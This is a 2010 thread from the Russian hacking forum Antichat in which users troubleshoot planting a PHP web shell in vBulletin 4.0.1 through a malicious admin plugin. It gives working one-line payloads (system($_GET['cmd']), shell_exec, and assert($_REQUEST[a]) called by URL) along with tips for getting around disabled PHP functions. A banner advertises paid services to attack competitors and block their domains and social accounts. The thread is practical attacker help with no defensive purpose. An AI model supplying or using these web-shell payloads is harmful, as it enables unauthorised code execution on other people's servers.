Форум АНТИЧАТ - шелл в vBulletin 4.0.1

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
шелл в vBulletin 4.0.1

Опции темы

Поиск в этой теме

Опции просмотра

шелл в vBulletin 4.0.1

04.02.2010, 15:30

$ereg@

Познающий

Регистрация: 21.08.2008

Сообщений: 85

Провел на форуме:
298650

Репутация: 15

Отправить сообщение для $ereg@ с помощью ICQ

шелл в vBulletin 4.0.1

создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции

в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?

04.02.2010, 15:39

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

system может быть в дизабл функшионс, сначала посмотри phpinfo

04.02.2010, 15:43

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

Отправить сообщение для Bb0y с помощью ICQ

Отправить сообщение для Bb0y с помощью Yahoo

eval попробуй заюзать

04.02.2010, 15:49

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Цитата:

Сообщение от $ereg@

в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?

faq.php находится в корне форума..а не в админке.

04.02.2010, 16:17

$ereg@

Познающий

Регистрация: 21.08.2008

Сообщений: 85

Провел на форуме:
298650

Репутация: 15

гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)

08.02.2010, 12:09

greenly

Новичок

Регистрация: 09.09.2009

Сообщений: 7

Провел на форуме:
28763

Репутация: 0

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons "

09.02.2010, 02:49

+StArT+

Познающий

Регистрация: 10.02.2007

Сообщений: 38

Провел на форуме:
1223241

Репутация: 183

Отправить сообщение для +StArT+ с помощью ICQ

Цитата:

Сообщение от greenly

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons "

Воспользоваться альтернативой если такая имеется..

К примеру: shell_exec

PHP код:


		
			
<? echo(shell_exec('id')); ?>

Либо обходится средствами php.

09.02.2010, 17:52

greenly

Новичок

Регистрация: 09.09.2009

Сообщений: 7

Провел на форуме:
28763

Репутация: 0

shell_exec, eval тоже в запрете.
будем курить php

09.02.2010, 18:18

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

<?assert($_REQUEST[a]);?>

http://site/script.php?a=phpinfo();

и еще куча вариантов

#10

28.03.2010, 10:47

Serafim

Участник форума

Регистрация: 24.10.2006

Сообщений: 261

Провел на форуме:
3227914

Репутация: 174

А вот на счет 4.0.2 + права модера?

Реально ли?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Нужно залить шелл на сайт и задампить за $$$ на vBulletin 3.7.3	ZARO	О Работе	2	27.05.2010 08:24
Как залить шелл в vBulletin v3.6.0?	Elenberg	Форумы	19	06.02.2009 10:00
Как загрузить шелл в vBulletin Version 3.6.2 ?	cardons	Форумы	3	25.11.2006 06:12

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход